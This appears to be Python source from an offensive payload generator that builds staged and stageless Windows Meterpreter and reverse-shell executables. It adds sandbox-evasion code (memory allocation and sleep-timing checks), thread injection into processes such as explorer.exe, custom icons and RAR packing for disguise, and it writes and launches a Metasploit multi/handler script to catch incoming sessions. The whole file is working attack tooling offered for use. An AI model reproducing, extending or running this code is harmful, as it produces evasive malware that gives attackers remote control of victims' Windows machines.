def Windows_Staged_Or_No(): try: core.Windows_Method_Choice() WSON_while = True while WSON_while: Choice = core.core_input() if Choice == "1": Advanced_Windows_Staged_Meterpreter() WSON_while = False elif Choice == "2": Advanced_Windows_Stageless_Meterpreter() WSON_while = False elif Choice == "0": Modules() WSON_while = False else: core.Bad_Choice() except KeyboardInterrupt: core.Exit_Program()
def Advanced_Windows_Staged_Meterpreter(): try: core.Windows_Arch_Choice() AWSM_while = True while AWSM_while: Choice = core.core_input() if Choice == "1": AWSM_x86() AWSM_while = False elif Choice == "2": AWSM_x64() AWSM_while = False elif Choice == "0": Windows_Staged_Or_No() AWSM_while = False else: core.Bad_Choice() except KeyboardInterrupt: core.Exit_Program()
def Modules(): try: core.Module_Choice() Modules_while = True while Modules_while: Choice = core.core_input() if Choice == "1": Windows_Staged_Or_No() Modules_while = False elif Choice == "0": core.Exit_Program() Modules_while = False else: core.Bad_Choice() except KeyboardInterrupt: core.Exit_Program()
def Decoil(): print(""" |------------------------------------------------------------| |HARD MEMORY ALLOCATION | |------------------------------------------------------------| Please enter the number of decoil to add (unlimited). PS : 1 decoil = 1 secondes to sleep. Press ENTER for ignore this step. """) Number_Of_Decoil = core.core_input() Transform_To_Int = int(Number_Of_Decoil) Number_Of_Decoil = 0 Decoil_Code = "" while Number_Of_Decoil != Transform_To_Int: Number_Of_Decoil += 1 Memdmp1 = gen.Varname_Creator() Tac1 = gen.Varname_Creator() Tick1 = gen.Varname_Creator() Decoil_Code += "char * " + Memdmp1 + "= NULL;" Decoil_Code += Memdmp1 + " = (char *)malloc(300000000);" Decoil_Code += "if (" + Memdmp1 + " != NULL) {" Decoil_Code += "memset(" + Memdmp1 + ", 00, 300000000);}" Decoil_Code += "int " + Tick1 + " = GetTickCount();" Decoil_Code += "Sleep(1000);" Decoil_Code += "int " + Tac1 + " = GetTickCount();" Decoil_Code += "if ((" + Tac1 + " - " + Tick1 + ") < 1000) {exit(0);}" Decoil_Code += "free(" + Memdmp1 + ");" return Decoil_Code
def Add_Icon(): print(""" |------------------------------------------------------------| |In the "icon" folder, put your icon files in it. | |To specify an icon file, write as follows: my_icon_name.ico | |Press "ENTER" if you do not have an icon. | |------------------------------------------------------------| \n""") ICON = core.core_input() return ICON
def Local_Or_Remote(): print(""" |---------------------------------------| | [1] Local Thread Injection (DEFAULT); | | [2] Remote Thread Injection; | |---------------------------------------| """) Choice = core.core_input() if Choice == "1": Local_Thread_Injection = End_Local_Thread_Injection() return Local_Thread_Injection elif Choice == "2": print(""" |-----------------------------------------------------| | Which process to inject ? (DEFAULT = explorer.exe); | |-----------------------------------------------------| """) ProcessName = core.core_input() if ProcessName != "": Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName) return Remote_Thread_Injection else: ProcessName = "explorer.exe" Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName) return Remote_Thread_Injection else: Local_Thread_Injection = End_Local_Thread_Injection() return Local_Thread_Injection
def AWM_x64(): try: core.x64_Windows_Stageless_Choice() AWM_while = True while AWM_while: Choice = core.core_input() if Choice == "1": x64_Stageless_Win_Meterpreter_Rev_Tcp.Construction() AWM_while = False elif Choice == "2": x64_Stageless_Win_Meterpreter_Rev_Http.Construction() AWM_while = False elif Choice == "3": x64_Stageless_Win_Meterpreter_Rev_Https.Construction() AWM_while = False elif Choice == "4": x64_Stageless_Win_Shell_Rev_Tcp.Construction() AWM_while = False elif Choice == "0": Advanced_Windows_Staged_Meterpreter() AWM_while = False else: core.Bad_Choice() except KeyboardInterrupt: core.Exit_Program()
def Compress_Rar(FILENAME): print(""" |--------------------------------| | Compress EXE to rar archive ? | | [0] Nope; | | [1] Yeah; | |--------------------------------| """) CR = core.core_input() if CR == "0": pass elif CR == "1": os.chdir("output/") print(core.amcolors.OCRA + core.amcolors.BOLD + "[*] Compression" + core.amcolors.ENDC) ARCHIVE = FILENAME.replace('.exe', '.rar') ARCHIVE = ARCHIVE.replace('output/', '') FILENAME = FILENAME.replace('output/', '') COMPRESS = ['rar', 'a', '-m5', ARCHIVE, FILENAME] subprocess.run(COMPRESS, shell=False, stdout=subprocess.PIPE).stdout.decode('utf-8') print(core.amcolors.GREEN + core.amcolors.BOLD + "[+] Compressed" + core.amcolors.ENDC) else: pass
def Run_Meterpreter_Script(ARCH, PLATFORM, RC_PAYLOAD, LHOST, LPORT, TYPE): print(""" |-----------------------------| | Run multi/handler script ? | | [0] Nope; | | [1] Yeah; | |-----------------------------| """) RMS = core.core_input() if RMS == "0": pass elif RMS == "1": if ARCH == ("x64"): if PLATFORM == ("Windows"): if TYPE == ("Meterpreter"): LHOST = LHOST.replace('LHOST=', '') LPORT = LPORT.replace('LPORT=', '') RC_Meterpreter = "use exploit/multi/handler\n" RC_Meterpreter += "set payload " + RC_PAYLOAD + "\n" RC_Meterpreter += "set lhost " + LHOST + "\n" RC_Meterpreter += "set lport " + LPORT + "\n" RC_Meterpreter += "set AutoLoadStdapi false\n" RC_Meterpreter += "set AutoSystemInfo false\n" RC_Meterpreter += "set EnableStageEncoding true\n" RC_Meterpreter += "set StageEncoder x64/xor_dynamic\n" RC_Meterpreter += "set ExitOnSession false\n" RC_Meterpreter += "exploit -z" with open('AccessMe_To_Msf.rc', 'w') as f: f.write(RC_Meterpreter) os.system( "gnome-terminal -e 'msfconsole -r AccessMe_To_Msf.rc'") core.Clear() print(core.amcolors.OCRA + core.amcolors.BOLD + "[*] Deletion of the RC file in 12 seconds" + core.amcolors.ENDC) time.sleep(12) RM_MSF_RC = ["rm", "AccessMe_To_Msf.rc"] subprocess.run( RM_MSF_RC, shell=False, stdout=subprocess.PIPE).stdout.decode('utf-8') print(core.amcolors.GREEN + core.amcolors.BOLD + "[+] RC file deleted." + core.amcolors.ENDC) elif TYPE == ("Shell"): LHOST = LHOST.replace('LHOST=', '') LPORT = LPORT.replace('LPORT=', '') RC_Meterpreter = "use exploit/multi/handler\n" RC_Meterpreter += "set payload " + RC_PAYLOAD + "\n" RC_Meterpreter += "set lhost " + LHOST + "\n" RC_Meterpreter += "set lport " + LPORT + "\n" RC_Meterpreter += "set ExitOnSession false\n" RC_Meterpreter += "exploit -z" with open('AccessMe_To_Msf.rc', 'w') as f: f.write(RC_Meterpreter) os.system( "gnome-terminal -e 'msfconsole -r AccessMe_To_Msf.rc'") core.Clear() print(core.amcolors.OCRA + core.amcolors.BOLD + "[*] Deletion of the RC file in 12 seconds" + core.amcolors.ENDC) time.sleep(12) RM_MSF_RC = ["rm", "AccessMe_To_Msf.rc"] subprocess.run( RM_MSF_RC, shell=False, stdout=subprocess.PIPE).stdout.decode('utf-8') print(core.amcolors.GREEN + core.amcolors.BOLD + "[+] RC file deleted." + core.amcolors.ENDC) elif ARCH == ("x86"): if PLATFORM == ("Windows"): if TYPE == ("Meterpreter"): LHOST = LHOST.replace('LHOST=', '') LPORT = LPORT.replace('LPORT=', '') RC_Meterpreter = "use exploit/multi/handler\n" RC_Meterpreter += "set payload " + RC_PAYLOAD + "\n" RC_Meterpreter += "set lhost " + LHOST + "\n" RC_Meterpreter += "set lport " + LPORT + "\n" RC_Meterpreter += "set AutoLoadStdapi false\n" RC_Meterpreter += "set AutoSystemInfo false\n" RC_Meterpreter += "set EnableStageEncoding true\n" RC_Meterpreter += "set StageEncoder x86/xor_dynamic\n" RC_Meterpreter += "set ExitOnSession false\n" RC_Meterpreter += "exploit -z" with open('AccessMe_To_Msf.rc', 'w') as f: f.write(RC_Meterpreter) os.system( "gnome-terminal -e 'msfconsole -r AccessMe_To_Msf.rc'") core.Clear() print(core.amcolors.OCRA + core.amcolors.BOLD + "[*] Deletion of the RC file in 12 seconds" + core.amcolors.ENDC) time.sleep(12) RM_MSF_RC = ["rm", "AccessMe_To_Msf.rc"] subprocess.run( RM_MSF_RC, shell=False, stdout=subprocess.PIPE).stdout.decode('utf-8') print(core.amcolors.GREEN + core.amcolors.BOLD + "[+] RC file deleted." + core.amcolors.ENDC) elif TYPE == ("Shell"): LHOST = LHOST.replace('LHOST=', '') LPORT = LPORT.replace('LPORT=', '') RC_Meterpreter = "use exploit/multi/handler\n" RC_Meterpreter += "set payload " + RC_PAYLOAD + "\n" RC_Meterpreter += "set lhost " + LHOST + "\n" RC_Meterpreter += "set lport " + LPORT + "\n" RC_Meterpreter += "set ExitOnSession false\n" RC_Meterpreter += "exploit -z" with open('AccessMe_To_Msf.rc', 'w') as f: f.write(RC_Meterpreter) os.system( "gnome-terminal -e 'msfconsole -r AccessMe_To_Msf.rc'") core.Clear() print(core.amcolors.OCRA + core.amcolors.BOLD + "[*] Deletion of the RC file in 12 seconds" + core.amcolors.ENDC) time.sleep(12) RM_MSF_RC = ["rm", "AccessMe_To_Msf.rc"] subprocess.run( RM_MSF_RC, shell=False, stdout=subprocess.PIPE).stdout.decode('utf-8') print(core.amcolors.GREEN + core.amcolors.BOLD + "[+] RC file deleted." + core.amcolors.ENDC) else: pass